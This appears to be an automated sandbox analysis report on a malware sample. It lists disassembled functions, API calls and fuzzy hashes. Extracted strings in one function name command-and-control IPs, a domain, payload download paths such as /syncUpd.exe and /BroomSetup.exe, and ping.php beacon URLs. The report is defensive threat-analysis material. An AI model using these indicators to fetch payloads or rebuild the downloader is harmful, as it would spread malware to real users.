Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 04255895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 042558E6

Memory Dump Source

Source File: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, Offset: 04255000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4255000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 82059e5eae4d3af1ccdee615fbd4d9a26ef6b0c4350985af7738ffc2e17ec57e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CF113C79A00208FFDB01DF98C985E98BBF5AF08351F058094F9489B362D375EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05C04C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 05C06823: __EH_prolog.LIBCMT ref: 05C06828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05C04D3B

Part of subcall function 05C062B1: __EH_prolog.LIBCMT ref: 05C062B6
Part of subcall function 05C062B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05C06398

Strings

185.172.128.228, xrefs: 05C05527, 05C055CD, 05C0574C
Installed, xrefs: 05C05466, 05C054C4
SOFTWARE\BroomCleaner, xrefs: 05C05358, 05C0544C
/1/Package.zip, xrefs: 05C05C7B, 05C05D15, 05C05D6F
185.172.128.228, xrefs: 05C05F88, 05C06034, 05C06139
185.172.128.59, xrefs: 05C057A3, 05C0583D, 05C05AB4
/syncUpd.exe, xrefs: 05C05923, 05C059A5, 05C05AD6
iC, xrefs: 05C05E24
/timeSync.exe, xrefs: 05C059C6, 05C05A59, 05C05AC7
.zip, xrefs: 05C05DC4, 05C05DE6
P, xrefs: 05C05312
/ping.php?substr=%s, xrefs: 05C055EE, 05C056C4, 05C056DC
.exe, xrefs: 05C0618D, 05C061AF
185.172.128.203, xrefs: 05C0585E, 05C05904, 05C05AA6
.exe, xrefs: 05C05B18, 05C05B3A
P, xrefs: 05C05ABC
@, xrefs: 05C04CE3
P, xrefs: 05C0614A
note.padd.cn.com, xrefs: 05C05BA9, 05C05C61, 05C05D66
/BroomSetup.exe, xrefs: 05C0604E, 05C060F4, 05C06142
\run.exe, xrefs: 05C05E37, 05C05E8F
P, xrefs: 05C0575C
185.172.128.90, xrefs: 05C0521A, 05C052B4, 05C05302
P, xrefs: 05C05D77
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 05C0501D, 05C051B3, 05C051CC

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: aa45419f4f200031b546703caeaf7ea7f0b5a4cde0c7ea580b1e09087a6d8deb
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 53A2151060F2D06EC711BB7C585A7DE2BE09B63240F58B8E9C2A55B363CB65B10CD7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#QNAN, xrefs: 00422758
1#IND, xrefs: 0042274A
1#SNAN, xrefs: 00422751
1#INF, xrefs: 0042275F

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 05C008FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05C00997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05C009C0
GetACP.KERNEL32 ref: 05C009D5

Strings

ACP, xrefs: 05C0091C
OCP, xrefs: 05C00952

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: 8255fa0d8cffda841e0dc6b30e3376c79a7bcee1c22a55d010d10bea7e06b352
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8F21B232B04104AAFF309F55C909FA7B2A7BB44A61B879C65E94AF7180E732DB40C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 05C00AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FDF
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FEC

GetUserDefaultLCID.KERNEL32 ref: 05C00BDE
IsValidCodePage.KERNEL32(00000000), ref: 05C00C39
IsValidLocale.KERNEL32(?,00000001), ref: 05C00C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05C00C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05C00CAF

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 2e72684525e2fb4bb0ee38b6c221f86ccb31be79a7adb6dca7f4aa895779a1a8
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 1C519371A04215ABDF20EFA5DC48BBA77B8FF04704F865965E905F71D0EBB09A04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 05C0019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

IsValidCodePage.KERNEL32(00000000), ref: 05C0027C
_wcschr.LIBVCRUNTIME ref: 05C0030C
_wcschr.LIBVCRUNTIME ref: 05C0031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05C003BD

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: ce8ed0575a4a219e48527197a80cb85c54263c09bf2a7eb06bdc8a6e9b57ddf2
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: F461E872704606ABD725EF74CC4DFB673A8FF04340F55686AEA46E71C0EA74EA4487A0

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 05BF09A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05BF0A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05BF0AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05BF0AB1

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: 6262bfa88828145cdd6dd2a01b714b55f12a6f494d953de22b4ae800d3db5c44
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: F831B57490121CABCB21DF64DC8879DB7B4FF08310F5441EAE50DA7260E7309B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 05BF3C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,05BF3C24,00000003,00438DB0,0000000C,05BF3D7B,00000003,00000002,00000000,?,05BF2DD2,00000003), ref: 05BF3C6F
TerminateProcess.KERNEL32(00000000,?,05BF3C24,00000003,00438DB0,0000000C,05BF3D7B,00000003,00000002,00000000,?,05BF2DD2,00000003), ref: 05BF3C76
ExitProcess.KERNEL32 ref: 05BF3C88

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 39a1496a4c216ea177a517f5f54bc15703250770742a13f7a1e32e55c432e8e4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 61E0BF31200609ABCF116F54DD0CA593F69FB44285F514464FE4646131CB35EE56CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05BE092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

